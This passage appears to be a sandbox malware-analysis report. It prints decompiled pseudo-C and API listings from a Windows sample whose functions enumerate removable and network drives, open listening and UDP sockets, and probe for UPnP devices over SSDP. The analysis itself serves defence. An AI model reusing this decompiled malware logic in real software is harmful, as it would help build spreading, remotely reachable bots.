                                                                                  						_t69 = _t69 + 0xc;
                                                                                  						_v16 = _t38;
                                                                                  						_v3152 = _v16;
                                                                                  						if(_v3152 == 2 || _v3152 == 4) {
                                                                                  							GetVolumeInformationW( &_v24,  &_v3148, 0x105, 0, 0,  &_v2616, 0, 0);
                                                                                  							GetDiskFreeSpaceExW( &_v24, 0,  &_v2612, 0);
                                                                                  							_push(0);
                                                                                  							_push(0x40000000);
                                                                                  							_t63 = _v2608;
                                                                                  							_push(_t63);
                                                                                  							_t43 = _v2612.LowPart;
                                                                                  							_push(_t43);
                                                                                  							L0040F1B0();
                                                                                  							_push(_t63);
                                                                                  							wsprintfW( &_v556, L" (%dGB)", _t43);
                                                                                  							_t70 = _t69 + 0x10;
                                                                                  							if((_v3148 & 0x0000ffff) == 0) {
                                                                                  								wsprintfW( &_v3148, L"Unnamed volume");
                                                                                  								_t70 = _t70 + 8;
                                                                                  							}
                                                                                  							wsprintfW( &_v2604, L"%s%s",  &_v3148,  &_v556);
                                                                                  							E00404BD0( &_v24,  &_v2604, _v2616, ( &_v556 & 0xffffff00 | _v16 == 0x00000004) & 0x000000ff);
                                                                                  							_t69 = _t70 + 0x20;
                                                                                  						}
                                                                                  						_v12 = _v12 + 1;
                                                                                  					}
                                                                                  					Sleep(0x7d0);
                                                                                  				}
                                                                                  				ExitThread(0);
                                                                                  			}





















                                                                                  0x004050be
                                                                                  0x004050d0
                                                                                  0x004050db
                                                                                  0x004050e0
                                                                                  0x004050e3
                                                                                  0x004050e8
                                                                                  0x004050fa
                                                                                  0x004050fd
                                                                                  0x0040510f
                                                                                  0x00405125
                                                                                  0x0040512a
                                                                                  0x0040512d
                                                                                  0x00405133
                                                                                  0x00405140
                                                                                  0x0040516f
                                                                                  0x00405184
                                                                                  0x0040518a
                                                                                  0x0040518c
                                                                                  0x00405191
                                                                                  0x00405197
                                                                                  0x00405198
                                                                                  0x0040519e
                                                                                  0x0040519f
                                                                                  0x004051a4
                                                                                  0x004051b2
                                                                                  0x004051b8
                                                                                  0x004051c4
                                                                                  0x004051d2
                                                                                  0x004051d8
                                                                                  0x004051d8
                                                                                  0x004051f5
                                                                                  0x0040521b
                                                                                  0x00405220
                                                                                  0x00405220
                                                                                  0x0040510c
                                                                                  0x0040510c
                                                                                  0x0040522d
                                                                                  0x0040522d
                                                                                  0x0040523a

                                                                                  APIs
                                                                                  • Sleep.KERNEL32(000003E8), ref: 004050BE
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00414418,00000104), ref: 004050D0
                                                                                    • Part of subcall function 0040D530: CreateFileW.KERNEL32(P@,80000000,00000001,00000000,00000003,00000000,00000000,004050E0), ref: 0040D550
                                                                                    • Part of subcall function 0040D530: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D565
                                                                                    • Part of subcall function 0040D530: CloseHandle.KERNEL32(000000FF), ref: 0040D572
                                                                                  • ExitThread.KERNEL32 ref: 0040523A
                                                                                    • Part of subcall function 004048C0: GetLogicalDrives.KERNEL32 ref: 004048C6
                                                                                    • Part of subcall function 004048C0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00404914
                                                                                    • Part of subcall function 004048C0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404941
                                                                                    • Part of subcall function 004048C0: RegCloseKey.ADVAPI32(?), ref: 0040495E
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040522D
                                                                                    • Part of subcall function 00404860: lstrcpyW.KERNEL32 ref: 004048B3
                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040516F
                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00405184
                                                                                  • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040519F
                                                                                  • wsprintfW.USER32 ref: 004051B2
                                                                                  • wsprintfW.USER32 ref: 004051D2
                                                                                  • wsprintfW.USER32 ref: 004051F5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                  • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                  • API String ID: 1650488544-2117135753
                                                                                  • Opcode ID: f1572abb67f03b3e23ee054d932ea7d3a2152c95165b90b0fb75db5c9ca44455
                                                                                  • Instruction ID: a985ed85a03a777e582de5830084f45234a9f7b72307fd88a6662299d951ba90
                                                                                  • Opcode Fuzzy Hash: f1572abb67f03b3e23ee054d932ea7d3a2152c95165b90b0fb75db5c9ca44455
                                                                                  • Instruction Fuzzy Hash: 67418371D00214ABE754DB94DC45FEE7778EB48704F1085AAF209B51D0DA785B88CF6A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 45%
                                                                                  			E0040EEA0(void* __esi) {
                                                                                  				struct _SYSTEM_INFO _v36;
                                                                                  				short _v40;
                                                                                  				char _v77;
                                                                                  				short _v82;
                                                                                  				short _v86;
                                                                                  				short _v90;
                                                                                  				short _v92;
                                                                                  				short _v94;
                                                                                  				short _v96;
                                                                                  				short _v98;
                                                                                  				char _v100;
                                                                                  				void* __edi;
                                                                                  				intOrPtr* _t30;
                                                                                  				void* _t33;
                                                                                  				void* _t36;
                                                                                  				intOrPtr _t37;
                                                                                  				short _t39;
                                                                                  				intOrPtr _t40;
                                                                                  				intOrPtr* _t54;
                                                                                  				void* _t56;
                                                                                  				void* _t58;
                                                                                  				void* _t59;
                                                                                  
                                                                                  				_t30 = E00408E40(0x4c);
                                                                                  				_t54 = _t30;
                                                                                  				_t59 = _t58 + 4;
                                                                                  				if(_t54 == 0) {
                                                                                  					return _t30;
                                                                                  				} else {
                                                                                  					 *_t54 = 0x494f4350;
                                                                                  					GetSystemInfo( &_v36);
                                                                                  					_t45 = _v36.dwNumberOfProcessors;
                                                                                  					_t3 = _t54 + 0x20; // 0x20
                                                                                  					 *((intOrPtr*)(_t54 + 4)) = _v36.dwNumberOfProcessors + _t45;
                                                                                  					InitializeCriticalSection(_t3);
                                                                                  					_t33 = CreateEventA(0, 1, 0, 0);
                                                                                  					 *(_t54 + 0x10) = _t33;
                                                                                  					if(_t33 == 0) {
                                                                                  						L12:
                                                                                  						E0040E480(_t54);
                                                                                  						return 0;
                                                                                  					}
                                                                                  					_t36 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
                                                                                  					 *(_t54 + 8) = _t36;
                                                                                  					if(_t36 == 0) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					_t37 = E0040BEA0(_t45);
                                                                                  					 *((intOrPtr*)(_t54 + 0xc)) = _t37;
                                                                                  					if(_t37 == 0) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__WSASocketA(2, 1, 6, 0, 0, 1);
                                                                                  					 *((intOrPtr*)(_t54 + 0x14)) = _t37;
                                                                                  					if(_t37 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					_v77 = 1;
                                                                                  					__imp__#21(_t37, 0xffff, 4,  &_v77, 1);
                                                                                  					_v94 = 0;
                                                                                  					_v90 = 0;
                                                                                  					_v86 = 0;
                                                                                  					_v82 = 0;
                                                                                  					_t39 = _v40;
                                                                                  					_v96 = 2;
                                                                                  					_v92 = _t39;
                                                                                  					__imp__#9(_v36.dwOemId);
                                                                                  					_v98 = _t39;
                                                                                  					_t40 =  *((intOrPtr*)(_t54 + 0x14));
                                                                                  					__imp__#2(_t40,  &_v100, 0x10);
                                                                                  					if(_t40 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__#13( *((intOrPtr*)(_t54 + 0x14)), 0x7fffffff);
                                                                                  					if(_t40 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__WSACreateEvent();
                                                                                  					 *((intOrPtr*)(_t54 + 0x18)) = _t40;
                                                                                  					if(_t40 == 0) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					__imp__WSAEventSelect( *((intOrPtr*)(_t54 + 0x14)), _t40, 8);
                                                                                  					if(_t40 == 0xffffffff) {
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					_t56 = 0;
                                                                                  					if( *((intOrPtr*)(_t54 + 4)) > 0) {
                                                                                  						do {
                                                                                  							E0040BF50( *((intOrPtr*)(_t54 + 0xc)), 0, E0040EDD0, _t54, 0, 0);
                                                                                  							_t56 = _t56 + 1;
                                                                                  							_t59 = _t59 + 0x18;
                                                                                  						} while (_t56 <  *((intOrPtr*)(_t54 + 4)));
                                                                                  					}
                                                                                  					E0040BF50( *((intOrPtr*)(_t54 + 0xc)), 0, E0040E7A0, _t54, 0, 0);
                                                                                  					return _t54;
                                                                                  				}
                                                                                  			}

























                                                                                  0x0040eea6
                                                                                  0x0040eeab
                                                                                  0x0040eead
                                                                                  0x0040eeb2
                                                                                  0x0040f02a
                                                                                  0x0040eeb8
                                                                                  0x0040eebd
                                                                                  0x0040eec3
                                                                                  0x0040eec9
                                                                                  0x0040eecd
                                                                                  0x0040eed4
                                                                                  0x0040eed7
                                                                                  0x0040eee5
                                                                                  0x0040eeeb
                                                                                  0x0040eef0
                                                                                  0x0040f01f
                                                                                  0x0040f01f
                                                                                  0x00000000
                                                                                  0x0040f024
                                                                                  0x0040eefe
                                                                                  0x0040ef04
                                                                                  0x0040ef09
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040ef0f
                                                                                  0x0040ef14
                                                                                  0x0040ef19
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040ef2b
                                                                                  0x0040ef31
                                                                                  0x0040ef37
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040ef4c
                                                                                  0x0040ef51
                                                                                  0x0040ef5d
                                                                                  0x0040ef61
                                                                                  0x0040ef65
                                                                                  0x0040ef69
                                                                                  0x0040ef6e
                                                                                  0x0040ef78
                                                                                  0x0040ef7d
                                                                                  0x0040ef81
                                                                                  0x0040ef8d
                                                                                  0x0040ef92
                                                                                  0x0040ef97
                                                                                  0x0040efa0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040efaf
                                                                                  0x0040efb8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040efba
                                                                                  0x0040efc0
                                                                                  0x0040efc5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040efce
                                                                                  0x0040efd7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040efda
                                                                                  0x0040efdf
                                                                                  0x0040efe1
                                                                                  0x0040eff1
                                                                                  0x0040eff6
                                                                                  0x0040eff7
                                                                                  0x0040effa
                                                                                  0x0040efe1
                                                                                  0x0040f00f
                                                                                  0x0040f01e
                                                                                  0x0040f01e

                                                                                  APIs
                                                                                  • GetSystemInfo.KERNEL32(?), ref: 0040EEC3
                                                                                  • InitializeCriticalSection.KERNEL32(00000020), ref: 0040EED7
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040EEE5
                                                                                  • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040EEFE
                                                                                    • Part of subcall function 0040BEA0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040BEBE
                                                                                  • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 0040EF2B
                                                                                  • setsockopt.WS2_32 ref: 0040EF51
                                                                                  • htons.WS2_32(?), ref: 0040EF81
                                                                                  • bind.WS2_32(?,00000004,00000010), ref: 0040EF97
                                                                                  • listen.WS2_32(?,7FFFFFFF), ref: 0040EFAF
                                                                                  • WSACreateEvent.WS2_32 ref: 0040EFBA
                                                                                  • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040EFCE
                                                                                    • Part of subcall function 0040BF50: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040BF74
                                                                                    • Part of subcall function 0040BF50: CreateThread.KERNEL32 ref: 0040BFCF
                                                                                    • Part of subcall function 0040BF50: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C00C
                                                                                    • Part of subcall function 0040BF50: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040C017
                                                                                    • Part of subcall function 0040BF50: DuplicateHandle.KERNEL32(00000000), ref: 0040C01E
                                                                                    • Part of subcall function 0040BF50: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040C032
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 1603358586-0
                                                                                  • Opcode ID: 3a48ff714123f67728488ebd241aa5cbce844eebc6b7f1e346220b8f1150fb3f
                                                                                  • Instruction ID: 70d9824073996a0ff4c6e74931008e54e86ddc456e6e2338b5ab093a1f0703e2
                                                                                  • Opcode Fuzzy Hash: 3a48ff714123f67728488ebd241aa5cbce844eebc6b7f1e346220b8f1150fb3f
                                                                                  • Instruction Fuzzy Hash: DD41A470240702BFD3209F64DC4AF5AB7A5BF88710F108A3AF668E66D1D7B4E454C799
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040C94A
                                                                                  • htons.WS2_32(0000076C), ref: 0040C980
                                                                                  • inet_addr.WS2_32(239.255.255.250), ref: 0040C98F
                                                                                  • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C9AD
                                                                                    • Part of subcall function 00409880: htons.WS2_32(00000050), ref: 004098AD
                                                                                    • Part of subcall function 00409880: socket.WS2_32(00000002,00000001,00000000), ref: 004098CD
                                                                                    • Part of subcall function 00409880: connect.WS2_32(000000FF,?,00000010), ref: 004098E6
                                                                                    • Part of subcall function 00409880: getsockname.WS2_32(000000FF,?,00000010), ref: 00409918
                                                                                  • bind.WS2_32(000000FF,?,00000010), ref: 0040C9E3
                                                                                  • lstrlenA.KERNEL32(004105A0,00000000,?,00000010), ref: 0040C9FC
                                                                                  • sendto.WS2_32(000000FF,004105A0,00000000), ref: 0040CA0B
                                                                                  • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040CA25
                                                                                    • Part of subcall function 0040C840: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C88E
                                                                                    • Part of subcall function 0040C840: Sleep.KERNEL32(000003E8), ref: 0040C89E
                                                                                    • Part of subcall function 0040C840: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C8BB
                                                                                    • Part of subcall function 0040C840: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C8D1
                                                                                    • Part of subcall function 0040C840: StrChrA.SHLWAPI(?,0000000D), ref: 0040C8FE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                  • String ID: 239.255.255.250
                                                                                  • API String ID: 726339449-2186272203
                                                                                  • Opcode ID: f43b03ae6e4f538bd75ce9ea370b17764c9772fec20ce54065493977abab1f4b
                                                                                  • Instruction ID: b865f0e7113cd30ffca57b294248847536cf2bc14de9108ff1861f92315d7120
                                                                                  • Opcode Fuzzy Hash: f43b03ae6e4f538bd75ce9ea370b17764c9772fec20ce54065493977abab1f4b
                                                                                  • Instruction Fuzzy Hash: D241F8B4E10209EFDB04DFE4D889BEEBBB5EF48304F108169E905B7290D7B55A44CB69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 79%
                                                                                  			E0040C840(intOrPtr __eax, intOrPtr _a4, intOrPtr* _a8) {
                                                                                  				char _v1028;
                                                                                  				char _v1029;
                                                                                  				intOrPtr _v1036;
                                                                                  				char* _v1040;
                                                                                  				char* _v1044;
                                                                                  				intOrPtr _t20;
                                                                                  				intOrPtr _t29;
                                                                                  				void* _t37;
                                                                                  
                                                                                  				_t20 = __eax;
                                                                                  				_v1029 = 0;
                                                                                  				_v1036 = 0;
                                                                                  				while(_v1036 < 2) {
                                                                                  					__imp__#17(_a4,  &_v1028, 0x400, 0, 0, 0);
                                                                                  					if(_t20 != 0xffffffff) {
                                                                                  						_v1029 = 1;
                                                                                  						if(StrCmpNIA( &_v1028, "HTTP/1.1 200 OK", 0xf) == 0) {
                                                                                  							_v1040 = StrStrIA( &_v1028, "LOCATION: ");
                                                                                  							if(_v1040 != 0) {
                                                                                  								_v1044 = _v1040 + 0xa;
                                                                                  								_t29 = E0040B640(_v1044, _v1044, StrChrA(_v1044, 0xd) - _v1044);
                                                                                  								_t37 = _t37 + 8;
                                                                                  								 *_a8 = _t29;
                                                                                  							}
                                                                                  						}
                                                                                  					} else {
                                                                                  						Sleep(0x3e8);
                                                                                  					}
                                                                                  					_t20 = _v1036 + 1;
                                                                                  					_v1036 = _t20;
                                                                                  				}
                                                                                  				return _v1029;
                                                                                  			}











                                                                                  0x0040c840
                                                                                  0x0040c849
                                                                                  0x0040c850
                                                                                  0x0040c86b
                                                                                  0x0040c88e
                                                                                  0x0040c897
                                                                                  0x0040c8a6
                                                                                  0x0040c8c3
                                                                                  0x0040c8d7
                                                                                  0x0040c8e4
                                                                                  0x0040c8ef
                                                                                  0x0040c912
                                                                                  0x0040c917
                                                                                  0x0040c91d
                                                                                  0x0040c91d
                                                                                  0x0040c8e4
                                                                                  0x0040c899
                                                                                  0x0040c89e
                                                                                  0x0040c89e
                                                                                  0x0040c862
                                                                                  0x0040c865
                                                                                  0x0040c865
                                                                                  0x0040c92d

                                                                                  APIs
                                                                                  • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C88E
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040C89E
                                                                                  • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C8BB
                                                                                  • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C8D1
                                                                                  • StrChrA.SHLWAPI(?,0000000D), ref: 0040C8FE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleeprecvfrom
                                                                                  • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                  • API String ID: 668330359-3973262388
                                                                                  • Opcode ID: 2f358190d0f743e2d07f95898b3a29db7e7050231e642a267277ee9338021237
                                                                                  • Instruction ID: 9b34ca997a713d65cf6cd99f526d658ac5dfd41d516b48eadd98018a806326ed
                                                                                  • Opcode Fuzzy Hash: 2f358190d0f743e2d07f95898b3a29db7e7050231e642a267277ee9338021237
                                                                                  • Instruction Fuzzy Hash: 98216FF1940218EBDB20DB64DC89BE97774AB04308F1486E9E709B72C0D7B95AC68F5C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 44%
                                                                                  			E0040DC40(intOrPtr __edi, void* __esi) {
                                                                                  				short _v8;
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				short _v22;
                                                                                  				short _v24;
                                                                                  				short _v26;
                                                                                  				short _v28;
                                                                                  				short _v30;
                                                                                  				char _v33;
                                                                                  				char _v52;
                                                                                  				void* __ebx;
                                                                                  				void* _t21;
                                                                                  				short _t24;
                                                                                  				void* _t25;
                                                                                  				void* _t30;
                                                                                  				void* _t31;
                                                                                  				intOrPtr _t38;
                                                                                  				void* _t39;
                                                                                  
                                                                                  				_t39 = __esi;
                                                                                  				_t38 = __edi;
                                                                                  				if(__esi == 0 || __edi == 0) {
                                                                                  					return 0;
                                                                                  				} else {
                                                                                  					_t31 = E00408E40(0x24);
                                                                                  					 *_t31 = 0x756470;
                                                                                  					 *(_t31 + 4) = 0;
                                                                                  					_t21 = CreateEventA(0, 1, 0, 0);
                                                                                  					 *(_t31 + 0x10) = _t21;
                                                                                  					__imp__#23(2, 2, 0x11, _t30);
                                                                                  					 *(_t31 + 8) = _t21;
                                                                                  					if(_t21 == 0xffffffff) {
                                                                                  						E0040E0A0(_t31, __edi);
                                                                                  						_t31 = 0;
                                                                                  					}
                                                                                  					if(_t31 == 0) {
                                                                                  						L8:
                                                                                  						return _t31;
                                                                                  					}
                                                                                  					_v26 = 0;
                                                                                  					_v22 = 0;
                                                                                  					_v18 = 0;
                                                                                  					_v14 = 0;
                                                                                  					_t24 = _v8;
                                                                                  					_v24 = _t24;
                                                                                  					_v28 = 2;
                                                                                  					__imp__#9(_t39);
                                                                                  					_v30 = _t24;
                                                                                  					_v33 = 1;
                                                                                  					_t25 =  *(_t31 + 8);
                                                                                  					__imp__#21(_t25, 0xffff, 4,  &_v33, 1);
                                                                                  					__imp__#2( *(_t31 + 8),  &_v52, 0x10);
                                                                                  					if(_t25 != 0xffffffff) {
                                                                                  						 *((intOrPtr*)(_t31 + 0xc)) = _t38;
                                                                                  						 *((intOrPtr*)(_t31 + 0x14)) = CreateThread(0, 0, E0040DE70, _t31, 0, 0);
                                                                                  						goto L8;
                                                                                  					}
                                                                                  					E0040E0A0(_t31, _t38);
                                                                                  					return 0;
                                                                                  				}
                                                                                  			}





















                                                                                  0x0040dc40
                                                                                  0x0040dc40
                                                                                  0x0040dc48
                                                                                  0x0040dd34
                                                                                  0x0040dc56
                                                                                  0x0040dc65
                                                                                  0x0040dc6b
                                                                                  0x0040dc71
                                                                                  0x0040dc78
                                                                                  0x0040dc84
                                                                                  0x0040dc87
                                                                                  0x0040dc8d
                                                                                  0x0040dc93
                                                                                  0x0040dc95
                                                                                  0x0040dc9a
                                                                                  0x0040dc9a
                                                                                  0x0040dc9e
                                                                                  0x0040dd2e
                                                                                  0x00000000
                                                                                  0x0040dd30
                                                                                  0x0040dca6
                                                                                  0x0040dcaa
                                                                                  0x0040dcae
                                                                                  0x0040dcb2
                                                                                  0x0040dcb7
                                                                                  0x0040dcc1
                                                                                  0x0040dcc5
                                                                                  0x0040dcca
                                                                                  0x0040dcd9
                                                                                  0x0040dcde
                                                                                  0x0040dce3
                                                                                  0x0040dcec
                                                                                  0x0040dcfd
                                                                                  0x0040dd06
                                                                                  0x0040dd22
                                                                                  0x0040dd2b
                                                                                  0x00000000
                                                                                  0x0040dd2b
                                                                                  0x0040dd08
                                                                                  0x0040dd13
                                                                                  0x0040dd13

                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040DC78
                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040DC87
                                                                                  • htons.WS2_32(00009E34), ref: 0040DCCA
                                                                                  • setsockopt.WS2_32(?,0000FFFF), ref: 0040DCEC
                                                                                  • bind.WS2_32(?,00000004,00000010), ref: 0040DCFD
                                                                                    • Part of subcall function 0040E0A0: SetEvent.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0B1
                                                                                    • Part of subcall function 0040E0A0: WaitForSingleObject.KERNEL32(?,000000FF,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0BD
                                                                                    • Part of subcall function 0040E0A0: CloseHandle.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0C7
                                                                                  • CreateThread.KERNEL32 ref: 0040DD25
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                  • String ID:
                                                                                  • API String ID: 4174406920-0
                                                                                  • Opcode ID: e0deb46f6249aab11057c1623816a68f58c02373a903b3bf61f542a5b78949b5
                                                                                  • Instruction ID: e4b1bb25e16b1a4212620234c740e3462210c18eb357fd28b9ad958c2a756cf5
                                                                                  • Opcode Fuzzy Hash: e0deb46f6249aab11057c1623816a68f58c02373a903b3bf61f542a5b78949b5
                                                                                  • Instruction Fuzzy Hash: B0219FB4644301AEE710DFB48C8AB5B76A0AF48710F50897EFA54DE2C1D7F8C848876A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 58%
                                                                                  			E0040B8F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				char _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				intOrPtr _t38;
                                                                                  				intOrPtr _t43;
                                                                                  
                                                                                  				_v12 = _a16;
                                                                                  				if(_a16 != 0xffffffff) {
                                                                                  					_v12 = GetTickCount() + _v12;
                                                                                  				}
                                                                                  				_v8 = _a8;
                                                                                  				while(1) {
                                                                                  					_v16 = 0;
                                                                                  					_t38 = _a4;
                                                                                  					__imp__#10(_t38, 0x4004667f,  &_v16);
                                                                                  					if(_t38 == 0xffffffff) {
                                                                                  						break;
                                                                                  					}
                                                                                  					if(_v16 > 0) {
                                                                                  						if(_v16 >= _a12) {
                                                                                  							_v24 = _a12;
                                                                                  						} else {
                                                                                  							_v24 = _v16;
                                                                                  						}
                                                                                  						_t43 = _a4;
                                                                                  						__imp__#16(_t43, _v8, _v24, 0);
                                                                                  						_v20 = _t43;
                                                                                  						if(_v20 > 0) {
                                                                                  							if(_a16 != 0xffffffff) {
                                                                                  								_v12 = GetTickCount() + _a16;
                                                                                  							}
                                                                                  							_a12 = _a12 - _v20;
                                                                                  							_v8 = _v8 + _v20;
                                                                                  						}
                                                                                  					}
                                                                                  					Sleep(1);
                                                                                  					if(GetTickCount() > _v12 || _a12 == 0) {
                                                                                  						L15:
                                                                                  						return 0 | _a12 == 0x00000000;
                                                                                  					} else {
                                                                                  						continue;
                                                                                  					}
                                                                                  				}
                                                                                  				goto L15;
                                                                                  			}










                                                                                  0x0040b8f9
                                                                                  0x0040b900
                                                                                  0x0040b90b
                                                                                  0x0040b90b
                                                                                  0x0040b911
